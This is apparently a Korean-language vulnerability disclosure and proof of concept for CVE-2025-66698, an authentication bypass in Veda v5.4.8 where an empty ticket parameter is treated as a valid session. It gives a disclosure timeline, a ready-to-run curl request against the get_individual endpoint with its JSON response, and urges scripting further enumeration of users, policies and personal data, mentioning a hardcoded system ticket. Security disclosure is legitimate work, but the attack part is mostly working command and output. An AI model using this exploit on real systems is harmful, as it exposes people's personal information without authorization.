
CVE-2025-66698에 대한 개념 증명: Veda v5.4.8에서 빈 ticket 매개변수를 통한 인증 우회, 인증되지 않은 API 엔드포인트를 통해 사용자, 정책 및 개인식별정보(PII) 열거 가능.
대상 소프트웨어: Veda (Semantic Machines) v5.4.8 (이전 버전 대부분 포함). 취약점 유형: 인증 우회. CVE ID: CVE-2025-66698. 요약: 시스템이 ticket 매개변수를 부적절하게 검증하여, 빈 문자열을 유효한 세션으로 처리합니다. 프로젝트 링크: Veda (Semantic Machines)
2025년 11월 18일: 발견 및 초기 CVE 요청. 2026년 1월 9일: CVE ID 할당. 공급업체에 연락 시도 (무시 및 삭제됨). 2026년 1월 13일: 공급업체의 응답 부재로 인한 공개 공개.
이 취약점은 코드를 검토하는 보안 연구 과정에서 발견되었습니다. 코드의 ticket 매개변수는 빈 값에 대한 검사를 수행하지 않습니다.
영향을 받는 일부 API 엔드포인트:
열거할 수 있는 많은 기본 사용자가 있으며, cfg를 v-s 등으로 변경하여 사용자, 정책, PII(전체 이름, 사진, 직함, 생년월일, 연락처 정보 등) 등을 열거할 수도 있습니다.
curl "https://localhost/get_individual?ticket=&uri=cfg:VedaSystem" -k
{"@":"cfg:VedaSystem","rdf:type":[{"data":"v-s:Person","type":"Uri"}],"rdfs:isDefinedBy":[{"data":"http://semantic-machines.com/veda/system-account","type":"Uri"}],"rdfs:label":[{"data":"Система .","lang":"RU","type":"String"},{"data":"System .","lang":"EN","type":"String"}],"v-s:actualVersion":[{"data":"cfg:VedaSystem","type":"Uri"}],"v-s:author":[{"data":"cfg:VedaSystem","type":"Uri"}],"v-s:birthday":[{"data":"2014-03-04T20:00:00Z","type":"Datetime"}],"v-s:created":[{"data":"2025-11-18T14:49:45Z","type":"Datetime"}],"v-s:creator":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:defaultAppointment":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:edited":[{"data":"2025-11-18T17:08:59Z","type":"Datetime"}],"v-s:hasAccount":[{"data":"cfg:VedaSystemAccount","type":"Uri"}],"v-s:hasAppointment":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:hasAspect":[{"data":"cfg:VedaSystem_aspect","type":"Uri"}],"v-s:hasImage":[{"data":"v-s:DefaultPhoto","type":"Uri"}],"v-s:lastEditor":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:lastName":[{"data":"Система","lang":"RU","type":"String"},{"data":"System","lang":"EN","type":"String"}],"v-s:parentOrganization":[{"data":"cfg:org_Veda","type":"Uri"}],"v-s:updateCounter":[{"data":93,"type":"Integer"}],"v-ui:hasPreferences":[{"data":"cfg:VedaSystem_pref","type":"Uri"}]}
해야 할 일은 이러한 엔터티 "xxx:xxx"(cfg:xxx, v-s:xxx 등)를 계속해서 더 많이 찾는 것입니다. 이를 위해 간단한 bash 스크립트를 작성할 수 있습니다. 동일한 결과를 얻기 위한 하드코딩된 systicket도 있습니다.
CVSS 평가:
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N 점수: 8.6 (높음)AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N 점수: 9.3 (심각)